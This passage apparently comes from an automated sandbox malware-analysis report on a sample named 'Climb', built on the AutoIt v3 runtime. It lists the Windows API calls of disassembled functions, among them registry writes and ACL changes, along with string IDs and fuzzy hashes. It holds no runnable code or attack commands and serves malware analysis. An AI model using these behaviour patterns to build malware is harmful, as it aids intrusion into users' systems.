                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00141D3D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00141D58
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00141D6C
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00141D84
                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00141DAA
                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00141DC4
                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00141DDB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00141E46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                          • Opcode ID: 239996cf1c6f2696e7028ac94624f8f271562967d1b6ed24db32a8a84929a2fa
                                                                                                                                                                          • Instruction ID: 91d37c269f83e1e11cf12b08267624bbb8d1c817c753780afa0159bd3bf125df
                                                                                                                                                                          • Opcode Fuzzy Hash: 239996cf1c6f2696e7028ac94624f8f271562967d1b6ed24db32a8a84929a2fa
                                                                                                                                                                          • Instruction Fuzzy Hash: B4B18F71604301AFDB14DF64D889BAEBBE5FF85354F00891CF9999B2A1C731E884CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00140D81
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00140DBB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00140E25
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00140E8D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00140F11
                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00140F61
                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00140FA0
                                                                                                                                                                            • Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D
                                                                                                                                                                            • Part of subcall function 00112B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00112BA5
                                                                                                                                                                            • Part of subcall function 00112B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00112BD7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                          • Opcode ID: aaef54a8682cd665eb148199f9c7e8b5d831abe6322d55902ad89821536d902f
                                                                                                                                                                          • Instruction ID: 5992857e1989b77b34d4c7791635b09f868ff27b3bbeaa6dae202871e49fc38b
                                                                                                                                                                          • Opcode Fuzzy Hash: aaef54a8682cd665eb148199f9c7e8b5d831abe6322d55902ad89821536d902f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CE1DF312083419FC719DF25C9518AAB3E2FF98754B14896CF49AAB3B2DB30ED85CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B25F8
                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 000B2600
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B262B
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 000B2633
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 000B2658
                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000B2675
                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000B2685
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000B26B8
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000B26CC
                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 000B26EA
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000B2706
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B2711
                                                                                                                                                                            • Part of subcall function 000B19CD: GetCursorPos.USER32(?), ref: 000B19E1
                                                                                                                                                                            • Part of subcall function 000B19CD: ScreenToClient.USER32(00000000,?), ref: 000B19FE
                                                                                                                                                                            • Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000001), ref: 000B1A23
                                                                                                                                                                            • Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000002), ref: 000B1A3D
                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,000B199C), ref: 000B2738
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                          • Opcode ID: cede9ddda825d2e25948e1760e585609e4555adade0ee5e216a6ae2df3e6bc45
                                                                                                                                                                          • Instruction ID: b228c6a40e2c5606277dd612e80ffc65a36c5ad5a5ef6f86343385bd2b783965
                                                                                                                                                                          • Opcode Fuzzy Hash: cede9ddda825d2e25948e1760e585609e4555adade0ee5e216a6ae2df3e6bc45
                                                                                                                                                                          • Instruction Fuzzy Hash: 69B15B35A002099FDF15DFA8DC85BEE7BB5FB48324F104229FA15AB2A0DB74D981CB51
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
                                                                                                                                                                            • Part of subcall function 00111A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
                                                                                                                                                                            • Part of subcall function 00111A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
                                                                                                                                                                            • Part of subcall function 00111A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
                                                                                                                                                                            • Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00111741
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00111775
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0011178C
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 001117C6
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001117E2
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 001117F9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00111801
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00111808
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00111829
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00111830
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0011185F
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00111881
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00111893
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118BA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001118C1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118CA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001118D1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001118DA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001118E1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 001118ED
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 001118F4
                                                                                                                                                                            • Part of subcall function 00111ADF: GetProcessHeap.KERNEL32(00000008,001114FD,?,00000000,?,001114FD,?), ref: 00111AED
                                                                                                                                                                            • Part of subcall function 00111ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001114FD,?), ref: 00111AF4
                                                                                                                                                                            • Part of subcall function 00111ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001114FD,?), ref: 00111B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: c143664f23e5e683fb07285ae77a8bc191f39e771c6d8f80e7d36c058cad27a2
                                                                                                                                                                          • Instruction ID: b503cf4913aa59f9898c0ea2d69e00099e548985b4e5c80e14d37de9bc92edbf
                                                                                                                                                                          • Opcode Fuzzy Hash: c143664f23e5e683fb07285ae77a8bc191f39e771c6d8f80e7d36c058cad27a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D714CB6D00209BBDF14DFA5EC44FEEBBB8AF45710F148125FA15A72A0D7319A85CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013CF1D
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0014DCD0,00000000,?,00000000,?,?), ref: 0013CFA4
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0013D004
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013D054
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013D0CF
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0013D112
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0013D221
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0013D2AD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0013D2E1
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013D2EE
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0013D3C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                          • Opcode ID: 87f22abd10cb4da074d9a0afdcbafc888e260963a57543afb666eb8902f65cd6
                                                                                                                                                                          • Instruction ID: 7fe7ed4f83101b5e911eb9e134158050a818377d6ed2d4690a500bde4deb4356
                                                                                                                                                                          • Opcode Fuzzy Hash: 87f22abd10cb4da074d9a0afdcbafc888e260963a57543afb666eb8902f65cd6
                                                                                                                                                                          • Instruction Fuzzy Hash: B81248356046019FDB14DF24D881AAAB7E5FF88714F14889DF89A9B3A2CB31FD41CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00141462
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014149D
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001414F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00141526
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001415A2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0014161D
                                                                                                                                                                            • Part of subcall function 000CFD52: _wcslen.LIBCMT ref: 000CFD5D
                                                                                                                                                                            • Part of subcall function 00113535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00113547
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                          • Opcode ID: 71abe669b6029989d614e2ff00849590b6627d52eb94aadec90fd15a65c46418
                                                                                                                                                                          • Instruction ID: 448239d729dd181ffc057d7df20406f61a2d2503471a433d84f74a92858ff65f
                                                                                                                                                                          • Opcode Fuzzy Hash: 71abe669b6029989d614e2ff00849590b6627d52eb94aadec90fd15a65c46418
                                                                                                                                                                          • Instruction Fuzzy Hash: 59E19E716083019FC714DF24C5509AAB7E2FF94314F15896DF89A9B3A2DB30ED85CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                          • Opcode ID: 071f2f23cb3b673a392026acc199edf8104f125028be129ea10d6fccbcf266ca
                                                                                                                                                                          • Instruction ID: 3e6d3c3e74334f2cbf7039b55889aa8183c0ae61e4e7395af2144898775ed2ba
                                                                                                                                                                          • Opcode Fuzzy Hash: 071f2f23cb3b673a392026acc199edf8104f125028be129ea10d6fccbcf266ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 5871D67260052A8BCB109F7CFA515FF33B2AB60754F220129F86AA7295FB35DD45C7A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00148DB5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00148DC9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00148DEC
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00148E0F
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00148E4D
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00146691), ref: 00148EA9
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00148EE2
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00148F25
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00148F5C
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00148F68
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00148F78
                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00146691), ref: 00148F87
                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00148FA4
                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00148FB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                          • Opcode ID: cd975d84eca228f19780fdf423eacffc587984e499b67698639d201724a8e410
                                                                                                                                                                          • Instruction ID: 10b3ba4f2d813696b029932de7a853a34b52d9d7d3cc68149c685f123beabc0e
                                                                                                                                                                          • Opcode Fuzzy Hash: cd975d84eca228f19780fdf423eacffc587984e499b67698639d201724a8e410
                                                                                                                                                                          • Instruction Fuzzy Hash: 1561DE71910215BAEB14DF64DC45BFEB7B8BF09B10F108116F815E61E1DF74AA94CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0012493D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00124948
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0012499F
                                                                                                                                                                          • _wcslen.LIBCMT ref: 001249DD
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00124A1B
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124A63
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124A9E
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00124ACC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                          • Opcode ID: 4117cb4e37394cdc330ad4d7634d59b565829375b5f2b44144074b5c20b6e886
                                                                                                                                                                          • Instruction ID: 2db82f7a5ec73e0d5a903b1d60ba6f3eda5a26fe01a88ffc5aa65376146a97c3
                                                                                                                                                                          • Opcode Fuzzy Hash: 4117cb4e37394cdc330ad4d7634d59b565829375b5f2b44144074b5c20b6e886
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D71B3726083129FC710EF24D8419ABB7F4EF98758F10892DF896972A2EB31DD45CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00116395
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001163A7
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001163BE
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 001163D3
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001163D9
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001163E9
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001163EF
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00116410
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0011642A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00116433
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0011649A
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001164D6
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001164DC
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001164E3
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0011653A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00116547
                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0011656C
                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00116596
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                          • Opcode ID: 6bea0628438067679e589cdd2d54e94384bba963a2a7f170f3dda9daff7e1fe7
                                                                                                                                                                          • Instruction ID: 82db6d57136159e9614e8261e00e5bfdf63a1b30751a9de2e699d284b405ea00
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bea0628438067679e589cdd2d54e94384bba963a2a7f170f3dda9daff7e1fe7
                                                                                                                                                                          • Instruction Fuzzy Hash: 0371AF31900705EFDB24DFA8DE45AAEBBF5FF48704F100928E586A29A0D776ED80CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00130884
